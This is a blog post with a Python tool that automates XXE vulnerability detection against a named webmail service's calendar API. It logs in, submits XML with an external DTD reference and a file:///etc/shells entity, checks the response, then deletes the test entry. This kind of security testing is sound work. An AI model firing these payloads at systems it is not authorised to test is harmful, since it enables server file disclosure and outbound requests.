• python编写的面向对象的XXE自动化检测工具(对单个功能进行检测)


    import XXE_check
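    def _require_env(name):
        """Return the value of environment variable *name*, or exit with a message.

        The test account used to be hard-coded in this file; reading it from the
        environment keeps the secret out of source control and out of blog posts.

        Raises:
            SystemExit: when the variable is unset or empty.
        """
        import os
        value = os.environ.get(name, "")
        if value == "":
            raise SystemExit("missing required environment variable: " + name)
        return value


    def _entry_xml(doctype, content, rec_email):
        """Build the calendar:addCalendar request body (bytes) for one test case.

        Args:
            doctype: DOCTYPE declaration prepended to the document; this is the
                part that differs between test cases.
            content: value of the <content> field, where the entity is referenced.
            rec_email: address placed in <recEmail>.

        Returns:
            The ASCII-encoded XML document; every other field is fixed.
        """
        return (doctype
                + '<object><int name="comeFrom">0</int><string name="validImg" /><string name="dateDesc" />'
                + '<int name="calendarType">10</int><string name="title">test</string><string name="site">test</string>'
                + '<string name="content">' + content + '</string><int name="labelId">10</int>'
                + '<string name="color">#319eff</string><int name="beforeTime">15</int><int name="beforeType">0</int>'
                + '<int name="recMyEmail">1</int><int name="recMySms">0</int><int name="enable">1</int>'
                + '<string name="recEmail">' + rec_email + '</string><string name="dateFlag">2014-10-29</string>'
                + '<string name="endDateFlag">2014-10-29</string><string name="startTime">1830</string>'
                + '<string name="endTime">1930</string><int name="sendInterval">0</int>'
                + '<string name="week">0000000</string></object>').encode("ascii")


    def _run_case(check, sid, payload, label):
        """Run one test case end to end: add the entry, inspect it, then delete it.

        Args:
            check: an XXE_check.xxe_check instance that is already logged in.
            sid: session id appended to every calendar URL.
            payload: request body for addCalendar (see _entry_xml).
            label: text printed after the case, as in the original tool.

        Returns:
            Whatever XXE_go returned: the seqNo string of the created entry,
            0 when no seqNo came back, or None on error.
        """
        base = "http://mail.richinfo.cn/calendar/s?func=calendar:"
        add_url = base + "addCalendar&sid=" + sid
        # 查看: list the entries of the day the test entry was created on.
        test_url = base + "getCalendarView&sid=" + sid
        test_dict = ('<object><int name="comeFrom">0</int><string name="startDate">2014-10-29</string>'
                     '<string name="endDate">2014-10-29</string><int name="maxCount">0</int></object>').encode("ascii")
        seqNos = check.XXE_go(add_url, payload, test_url, test_dict)
        print("测试用例为:" + label)
        # 删除: only when an entry was actually created.  The original sent a
        # delete request with seqNos "0" or "None" when XXE_go had failed.
        if seqNos:
            del_url = base + "delCalendar&sid=" + sid
            del_dict = ('<object><int name="comeFrom">0</int><int name="seqNos">' + str(seqNos)
                        + '</int><int name="actionType">0</int></object>').encode("ascii")
            check.del_test(del_url, del_dict)
        return seqNos


    if __name__ == "__main__":
        try:
            check = XXE_check.xxe_check()

            # 登录: the account comes from XXE_USER / XXE_PASSWORD in the environment.
            user = _require_env("XXE_USER")
            password = _require_env("XXE_PASSWORD")
            domain = "richinfo.cn"
            input_url = "http://mail.richinfo.cn/"
            getLoginUrl = "http://mail.richinfo.cn/webmail/login/loginapi.do"
            getLoginDict = {
                'usernumber': user,
                'password': password,
                'validateCode': "",
                'returnurl': "http%3A%2F%2Fmail.richinfo.cn%2Fwebmail%2Flogin%2Flogin.do",
                'loginType': "WEB",
                'version': "version",
                'userid': user,
                'mailType': "0",
                'passwordType': "0",
                'domain': domain,
                'mobileNumber': user,
                'model': "MAIL",
            }
            check.login(input_url, getLoginUrl, getLoginDict)
            sid = check.get_sid()
            rec_email = user + "@" + domain

            # 用例1: external DTD reference.
            _run_case(check, sid,
                      _entry_xml('<!DOCTYPE svg SYSTEM "http://oa05.com/11.dtd">', "test&test;", rec_email),
                      "<!DOCTYPE svg SYSTEM ‘http://oa05.com/11.dtd’>")

            # 用例2: local file entity; this is the case XXE_go's marker check is written for.
            _run_case(check, sid,
                      _entry_xml('<!DOCTYPE ANY [<!ENTITY all SYSTEM "file:///etc/shells">]>', "test&all;", rec_email),
                      "<!DOCTYPE ANY [<!ENTITY all SYSTEM ‘file:///etc/shells’>]>")
        except Exception:
            # Print the full traceback instead of just str(e) so a failing run
            # shows where it failed.
            import traceback
            traceback.print_exc()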
    import http.cookiejar
    import re
    import urllib.parse
    import urllib.request
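    class xxe_check:
        """Cookie-aware HTTP driver that submits XXE test cases to XML endpoints.

        A single ``urllib`` opener with a shared ``CookieJar`` is used for every
        request, so the session established by ``login`` carries over to
        ``XXE_go`` and ``del_test``.  Results are reported with ``print``.
        """

        def __init__(self, cookie_file="cookie.txt"):
            """Create the opener and remember where the session cookies are dumped.

            Args:
                cookie_file: path that ``login`` writes the cookies to and
                    ``get_sid`` reads them from; the default keeps the original
                    "cookie.txt" in the working directory.
            """
            self.cj = http.cookiejar.CookieJar()
            # Every request made through this opener reads and updates the jar.
            self.opener = urllib.request.build_opener(
                urllib.request.HTTPCookieProcessor(self.cj))
            # The endpoints under test take the raw XML body as a form POST.
            self.opener.addheaders = [('Content-Type', 'application/x-www-form-urlencoded')]
            self.cookie_file = cookie_file

        # 登录
        def login(self, input_url, getLoginUrl, getLoginDict):
            """Log in and dump the resulting cookies to ``self.cookie_file``.

            Args:
                input_url: page fetched first so the server can set its initial cookies.
                getLoginUrl: login endpoint that receives ``getLoginDict`` form-encoded.
                getLoginDict: form fields of the login request.

            Raises:
                urllib.error.URLError (incl. HTTPError) when a request fails.
            """
            with self.opener.open(input_url):
                pass
            post_data = urllib.parse.urlencode(getLoginDict).encode('utf-8')
            with self.opener.open(getLoginUrl, data=post_data):
                pass
            # One "name=value;" entry per line; get_sid() slices this text later.
            # (The original wrote every cookie twice because of a duplicated line.)
            with open(self.cookie_file, "w", encoding="utf-8") as f:
                f.writelines("%s=%s;\n" % (c.name, c.value) for c in self.cj)

        # 获取sid
        def get_sid(self):
            """Return the session id recovered from the cookie dump written by login().

            Raises:
                ValueError: when the "lang" marker is not present in the dump.
            """
            with open(self.cookie_file, encoding="utf-8") as f:
                allmsg = f.read()
            sid_location = allmsg.find("lang")
            if sid_location < 0:
                raise ValueError("no 'lang' marker in " + self.cookie_file + "; is the session logged in?")
            # NOTE(review): fixed-width slice relative to "lang", kept from the
            # original tool -- the offsets are empirical, verify against the real
            # cookie layout if sids come back truncated.
            return allmsg[sid_location + 4:sid_location + 42]

        # 执行XXE用例
        def XXE_go(self, add_url, add_dict, test_url, test_dict):
            """Submit one test case and report whether the entity was expanded.

            Args:
                add_url: endpoint that stores an entry (receives ``add_dict``).
                add_dict: XML request body (bytes) carrying the test case.
                test_url: endpoint that lists entries (receives ``test_dict``).
                test_dict: XML request body (bytes) for the listing request.

            Returns:
                The seqNo of the created entry as a string when the server
                answered S_OK and a positive number could be parsed, 0 when no
                seqNo was present in the response, or None on any error (which
                is printed rather than raised).
            """
            try:
                with self.opener.open(add_url, data=add_dict) as resadd:
                    add_resp = resadd.read().decode("utf-8")
                # The entry id follows "seqNo" in the response; the original
                # tool takes a fixed 3-character slice after the key.
                key_pos = add_resp.find("seqNo")
                seqNos = add_resp[key_pos + 7:key_pos + 10].strip() if key_pos >= 0 else ""
                if "S_OK" in add_resp:
                    # 查看日历: fetch the listing and cut out the entry we created.
                    with self.opener.open(test_url, data=test_dict) as riliresult:
                        all_msg = riliresult.read().decode("utf-8")
                    begin_msg = all_msg.find(seqNos)
                    msg = all_msg[begin_msg:begin_msg + 1000]
                    end_msg = msg.find("}")
                    print(msg)
                    # msg already starts at begin_msg, so the entry body is
                    # msg[:end_msg]; the original sliced msg[begin_msg:end_msg],
                    # which is usually empty and so never reported a finding.
                    entry = msg[:end_msg] if end_msg >= 0 else msg
                    # "/bin/sh" is the marker the /etc/shells test case expects to
                    # see echoed back in the stored entry.
                    if "/bin/sh" in entry:
                        print("存在XXE漏洞")
                    else:
                        print("不存在XXE漏洞")
                else:
                    print("没有发现XXE漏洞")
                # 判断seqNOS的值是否为空
                if seqNos == "":
                    return 0
                if int(seqNos) > 0:
                    return seqNos
                return None
            except Exception as e:
                print(e)
                return None

        # 删除添加的内容
        def del_test(self, del_url, del_dict):
            """Delete the entry created by XXE_go() so the test leaves no data behind."""
            with self.opener.open(del_url, data=del_dict) as res:
                body = res.read().decode("utf-8")
            if '"code":"S_OK"' in body:
                print("删除成功!")
            else:
                print("删除失败!")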
    
    
    
    
    
    
    
    
    
    
    
            
  • 原文地址:https://www.cnblogs.com/xinxinjava/p/4079172.html